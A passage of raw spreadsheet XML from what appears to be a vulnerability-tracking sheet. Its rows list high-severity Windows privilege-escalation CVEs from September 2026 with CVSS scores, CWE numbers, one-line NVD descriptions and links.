t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q947" s="5" t="inlineStr" /><c r="R947" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S947" s="5" t="inlineStr"><is><t>Use after free in Windows Work Folder Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T947" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69560</t></is></c></row><row r="948"><c r="A948" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B948" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C948" s="5" t="inlineStr"><is><t>CVE-2026-69563</t></is></c><c r="D948" s="5" t="n"><v>7</v></c><c r="E948" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F948" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G948" s="5" t="inlineStr" /><c r="H948" s="5" t="n"><v>0.002</v></c><c r="I948" s="5" t="inlineStr" /><c r="J948" s="5" t="inlineStr" /><c r="K948" s="5" t="inlineStr" /><c r="L948" s="5" t="inlineStr" /><c r="M948" s="5" t="inlineStr" /><c r="N948" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O948" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P948" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q948" s="5" t="inlineStr" /><c r="R948" s="5" t="inlineStr"><is><t>CWE-122, CWE-367</t></is></c><c r="S948" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T948" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69563</t></is></c></row><row r="949"><c r="A949" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B949" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C949" s="5" t="inlineStr"><is><t>CVE-2026-69564</t></is></c><c r="D949" s="5" t="n"><v>7</v></c><c r="E949" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F949" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G949" s="5" t="inlineStr" /><c r="H949" s="5" t="n"><v>0.003</v></c><c r="I949" s="5" t="inlineStr" /><c r="J949" s="5" t="inlineStr" /><c r="K949" s="5" t="inlineStr" /><c r="L949" s="5" t="inlineStr" /><c r="M949" s="5" t="inlineStr" /><c r="N949" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O949" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P949" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q949" s="5" t="inlineStr" /><c r="R949" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S949" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Online Certificate Status Protocol (OCSP) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T949" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69564</t></is></c></row><row r="950"><c r="A950" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B950" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C950" s="5" t="inlineStr"><is><t>CVE-2026-69567</t></is></c><c r="D950" s="5" t="n"><v>7</v></c><c r="E950" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F950" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G950" s="5" t="inlineStr" /><c r="H950" s="5" t="n"><v>0.002</v></c><c r="I950" s="5" t="inlineStr" /><c r="J950" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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50" s="5" t="inlineStr" /><c r="M950" s="5" t="inlineStr" /><c r="N950" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O950" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P950" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q950" s="5" t="inlineStr" /><c r="R950" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S950" s="5" t="inlineStr"><is><t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T950" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t></is></c></row><row r="951"><c r="A951" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B951" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C951" s="5" t="inlineStr"><is><t>CVE-2026-69573</t></is></c><c r="D951" s="5" t="n"><v>7</v></c><c r="E951" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F951" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G951" s="5" t="inlineStr" /><c r="H951" s="5" t="n"><v>0.003</v></c><c r="I951" s="5" t="inlineStr" /><c r="J951" s="5" t="inlineStr" /><c r="K951" s="5" t="inlineStr" /><c r="L951" s="5" t="inlineStr" /><c r="M951" s="5" t="inlineStr" /><c r="N951" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O951" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P951" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q951" s="5" t="inlineStr" /><c r="R951" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S951" s="5" t="inlineStr"><is><t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T951" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t></is></c></row><row r="952"><c r="A952" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B952" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C952" s="5" t="inlineStr"><is><t>CVE-2026-69574</t></is></c><c r="D952" s="5" t="n"><v>7</v></c><c r="E952" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F952" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G952" s="5" t="inlineStr" /><c r="H952" s="5" t="n"><v>0.003</v></c><c r="I952" s="5" t="inlineStr" /><c r="J952" s="5" t="inlineStr" /><c r="K952" s="5" t="inlineStr" /><c r="L952" s="5" t="inlineStr" /><c r="M952" s="5" t="inlineStr" /><c r="N952" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O952" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P952" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q952" s="5" t="inlineStr" /><c r="R952" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S952" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T952" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69574</t></is></c></row><row r="953"><c r="A953" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B953" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C953" s="5" t="inlineStr"><is><t>CVE-2026-69575</t></is></c><c r="D953" s="5" t="n"><v>7</v></c><c r="E953" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F953" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G953" s="5" t="inlineStr" /><c r="H953" s="5" t="n"><v>0.003</v></c><c r="I953" s="5" t="inlineStr" /><c r="J953" s="5" t="inlineStr" /><c r="K953" s="5" t="inlineStr" /><c r="L953" s="5" t="inlineStr" /><c r="M953" s="5" t="inlineStr" /><c r="N953" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O953" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P953" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q953" s="5" t="inlineStr" /><c r="R953" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S953" s="5" t="inlineStr"><is><t>Use after free in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T953" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69575</t></is></c></row><row r="954"><c r="A954" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B954" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C954" s="5" t="inlineStr"><is><t>CVE-2026-69578</t></is></c><c r="D954" s="5" t="n"><v>7</v></c><c r="E954" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F954" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G954" s="5" t="inlineStr" /><c r="H954" s="5" t="n"><v>0.002</v></c><c r="I954" s="5" t="inlineStr" /><c r="J954" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K95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54" s="5" t="inlineStr" /><c r="M954" s="5" t="inlineStr" /><c r="N954" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O954" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P954" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q954" s="5" t="inlineStr" /><c r="R954" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S954" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T954" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t></is></c></row><row r="955"><c r="A955" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B955" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C955" s="5" t="inlineStr"><is><t>CVE-2026-69581</t></is></c><c r="D955" s="5" t="n"><v>7</v></c><c r="E955" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F955" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G955" s="5" t="inlineStr" /><c r="H955" s="5" t="n"><v>0.002</v></c><c r="I955" s="5" t="inlineStr" /><c r="J955" s="5" t="inlineStr" /><c r="K955" s="5" t="inlineStr" /><c r="L955" s="5" t="inlineStr" /><c r="M955" s="5" t="inlineStr" /><c r="N955" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O955" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P955" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q955" s="5" t="inlineStr" /><c r="R955" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S955" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T955" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69581</t></is></c></row><row r="956"><c r="A956" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B956" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C956" s="5" t="inlineStr"><is><t>CVE-2026-69600</t></is></c><c r="D956" s="5" t="n"><v>7</v></c><c r="E956" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F956" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G956" s="5" t="inlineStr" /><c r="H956" s="5" t="n"><v>0.003</v></c><c r="I956" s="5" t="inlineStr" /><c r="J956" s="5" t="inlineStr" /><c r="K956" s="5" t="inlineStr" /><c r="L956" s="5" t="inlineStr" /><c r="M956" s="5" t="inlineStr" /><c r="N956" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O956" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P956" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q956" s="5" t="inlineStr" /><c r="R956" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S956" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T956" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t></is></c></row><row r="957"><c r="A957" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B957" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C957" s="5" t="inlineStr"><is><t>CVE-2026-69605</t></is></c><c r="D957" s="5" t="n"><v>7</v></c><c r="E957" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F957" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G957" s="5" t="inlineStr" /><c r="H957" s="5" t="n"><v>0.003</v></c><c r="I957" s="5" t="inlineStr" /><c r="J957" s="5" t="inlineStr" /><c r="K957" s="5" t="inlineStr" /><c r="L957" s="5" t="inlineStr" /><c r="M957" s="5" t="inlineStr" /><c r="N957" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O957" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P957" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q957" s="5" t="inlineStr" /><c r="R957" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S957" s="5" t="inlineStr"><is><t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T957" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t></is></c></row><row r="958"><c r="A958" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B958" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C958" s="5" t="inlineStr"><is><t>CVE-2026-69606</t></is></c><c r="D958" s="5" t="n"><v>7</v></c><c r="E958" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F958" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G958" s="5" t="inlineStr" /><c r="H958" s="5" t="n"><v>0.003</v></c><c r="I958" s="5" t="inlineStr" /><c r="J958" s="5" t="inlineStr" /><c r="K958" s="5" t="inlineStr" /><c r="L958" s="5" t="inlineStr" /><c r="M958" s="5" t="inlineStr" /><c r="N958" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O958" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P958" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q958" s="5" t="inlineStr" /><c r="R958" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S958" s="5" t="inlineStr"><is><t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T958" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69606</t></is></c></row><row r="959"><c r="A959" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B959" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C959" s="5" t="inlineStr"><is><t>CVE-2026-69610</t></is></c><c r="D959" s="5" t="n"><v>7</v></c><c r="E959" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F959" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G959" s="5" t="inlineStr" /><c r="H959" s="5" t="n"><v>0.003</v></c><c r="I959" s="5" t="inlineStr" /><c r="J959" s="5" t="inlineStr" /><c r="K959" s="5" t="inlineStr" /><c r="L959" s="5" t="inlineStr" /><c r="M959" s="5" t="inlineStr" /><c r="N959" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O959" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P959" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q959" s="5" t="inlineStr" /><c r="R959" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S959" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T959" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69610</t></is></c></row><row r="960"><c r="A960" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B960" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C960" s="5" t="inlineStr"><is><t>CVE-2026-69611</t></is></c><c r="D960" s="5" t="n"><v>7</v></c><c r="E960" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F960" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G960" s="5" t="inlineStr" /><c r="H960" s="5" t="n"><v>0.003</v></c><c r="I960" s="5" t="inlineStr" /><c r="J960" s="5" t="inlineStr" /><c r="K960" s="5" t="inlineStr" /><c r="L960" s="5" t="inlineStr" /><c r="M960" s="5" t="inlineStr" /><c r="N960" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O960" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P960" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q960" s="5" t="inlineStr" /><c r="R960" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S960" s="5" t="inlineStr"><is><t>Use after free in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T960" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69611</t></is></c></row><row r="961"><c r="A961" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B961" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C961" s="5" t="inlineStr"><is><t>CVE-2026-69613</t></is></c><c r="D961" s="5" t="n"><v>7</v></c><c r="E961" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F961" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G961" s="5" t="inlineStr" /><c r="H961" s="5" t="n"><v>0.003</v></c><c r="I961" s="5" t="inlineStr" /><c r="J961" s="5" t="inlineStr" /><c r="K961" s="5" t="inlineStr" /><c r="L961" s="5" t="inlineStr" /><c r="M961" s="5" t="inlineStr" /><c r="N961" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O961" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P961" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q961" s="5" t="inlineStr" /><c r="R961" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S961" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T961" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69613</t></is></c></row><row r="962"><c r="A962" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B962" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C962" s="5" t="inlineStr"><is><t>CVE-2026-69617</t></is></c><c r="D962" s="5" t="n"><v>7</v></c><c r="E962" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F962" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G962" s="5" t="inlineStr" /><c r="H962" s="5" t="n"><v>0.003</v></c><c r="I962" s="5" t="inlineStr" /><c r="J962" s="5" t="inlineStr" /><c r="K962" s="5" t="inlineStr" /><c r="L962" s="5" t="inlineStr" /><c r="M962" s="5" t="inlineStr" /><c r="N962" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O962" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P962" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q962" s="5" t="inlineStr" /><c r="R962" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S962" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T962" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69617</t></is></c></row><row r="963"><c r="A963" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B963" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C963" s="5" t="inlineStr"><is><t>CVE-2026-69621</t></is></c><c r="D963" s="5" t="n"><v>7</v></c><c r="E963" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F963" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G963" s="5" t="inlineStr" /><c r="H963" s="5" t="n"><v>0.003</v></c><c r="I963" s="5" t="inlineStr" /><c r="J963" s="5" t="inlineStr" /><c r="K963" s="5" t="inlineStr" /><c r="L963" s="5" t="inlineStr" /><c r="M963" s="5" t="inlineStr" /><c r="N963" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O963" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P963" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q963" s="5" t="inlineStr" /><c r="R963" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S963" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T963" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69621</t></is></c></row><row r="964"><c r="A964" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B964" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C964" s="5" t="inlineStr"><is><t>CVE-2026-69630</t></is></c><c r="D964" s="5" t="n"><v>7</v></c><c r="E964" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F964" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G964" s="5" t="inlineStr" /><c r="H964" s="5" t="n"><v>0.003</v></c><c r="I964" s="5" t="inlineStr" /><c r="J964" s="5" t="inlineStr" /><c r="K964" s="5" t="inlineStr" /><c r="L964" s="5" t="inlineStr" /><c r="M964" s="5" t="inlineStr" /><c r="N964" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O964" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P964" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q964" s="5" t="inlineStr" /><c r="R964" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S964" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T964" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69630</t></is></c></row><row r="965"><c r="A965" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B965" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C965" s="5" t="inlineStr"><is><t>CVE-2026-69645</t></is></c><c r="D965" s="5" t="n"><v>7</v></c><c r="E965" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F965" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G965" s="5" t="inlineStr" /><c r="H965" s="5" t="n"><v>0.003</v></c><c r="I965" s="5" t="inlineStr" /><c r="J965" s="5" t="inlineStr" /><c r="K965" s="5" t="inlineStr" /><c r="L965" s="5" t="inlineStr" /><c r="M965" s="5" t="inlineStr" /><c r="N965" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O965" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P965" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q965" s="5" t="inlineStr" /><c r="R965" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S965" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T965" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69645</t></is></c></row><row r="966"><c r="A966" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B966" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C966" s="5" t="inlineStr"><is><t>CVE-2026-69648</t></is></c><c r="D966" s="5" t="n"><v>7</v></c><c r="E966" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F966" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G966" s="5" t="inlineStr" /><c r="H966" s="5" t="n"><v>0.003</v></c><c r="I966" s="5" t="inlineStr" /><c r="J966" s="5" t="inlineStr" /><c r="K966" s="5" t="inlineStr" /><c r="L966" s="5" t="inlineStr" /><c r="M966" s="5" t="inlineStr" /><c r="N966" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O966" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P966" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q966" s="5" t="inlineStr" /><c r="R966" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S966" s="5" t="inlineStr"><is><t>Use after free in Windows Notification allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T966" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69648</t></is></c></row><row r="967"><c r="A967" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B967" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C967" s="5" t="inlineStr"><is><t>CVE-2026-69652</t></is></c><c r="D967" s="5" t="n"><v>7</v></c><c r="E967" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F967" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G967" s="5" t="inlineStr" /><c r="H967" s="5" t="n"><v>0.003</v></c><c r="I967" s="5" t="inlineStr" /><c r="J967" s="5" t="inlineStr" /><c r="K967" s="5" t="inlineStr" /><c r="L967" s="5" t="inlineStr" /><c r="M967" s="5" t="inlineStr" /><c r="N967" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O967" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P967" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q967" s="5" t="inlineStr" /><c r="R967" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S967" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T967" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69652</t></is></c></row><row r="968"><c r="A968" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B968" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C968" s="5" t="inlineStr"><is><t>CVE-2026-69654</t></is></c><c r="D968" s="5" t="n"><v>7</v></c><c r="E968" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F968" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G968" s="5" t="inlineStr" /><c r="H968" s="5" t="n"><v>0.003</v></c><c r="I968" s="5" t="inlineStr" /><c r="J968" s="5" t="inlineStr" /><c r="K968" s="5" t="inlineStr" /><c r="L968" s="5" t="inlineStr" /><c r="M968" s="5" t="inlineStr" /><c r="N968" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O968" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P968" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q968" s="5" t="inlineStr" /><c r="R968" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S968" s="5" t="inlineStr"><is><t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T968" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69654</t></is></c></row><row r="969"><c r="A969" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B969" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C969" s="5" t="inlineStr"><is><t>CVE-2026-69682</t></is></c><c r="D969" s="5" t="n"><v>7</v></c><c r="E969" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F969" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G969" s="5" t="inlineStr" /><c r="H969" s="5" t="n"><v>0.002</v></c><c r="I969" s="5" t="inlineStr" /><c r="J969" s="5" t="inlineStr" /><c r="K969" s="5" t="inlineStr" /><c r="L969" s="5" t="inlineStr" /><c r="M969" s="5" t="inlineStr" /><c r="N969" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O969" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P969" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q969" s="5" t="inlineStr" /><c r="R969" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S969" s="5" t="inlineStr"><is><t>Use after free in Windows Host Guardian Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T969" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69682</t></is></c></row><row r="970"><c r="A970" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B970" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C970" s="5" t="inlineStr"><is><t>CVE-2026-69692</t></is></c><c r="D970" s="5" t="n"><v>7</v></c><c r="E970" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F970" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G970" s="5" t="inlineStr" /><c r="H970" s="5" t="n"><v>0.003</v></c><c r="I970" s="5" t="inlineStr" /><c r="J970" s="5" t="inlineStr" /><c r="K970" s="5" t="inlineStr" /><c r="L970" s="5" t="inlineStr" /><c r="M970" s="5" t="inlineStr" /><c r="N970" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O970" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P970" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q970" s="5" t="inlineStr" /><c r="R970" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S970" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T970" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69692</t></is></c></row><row r="971"><c r="A971" 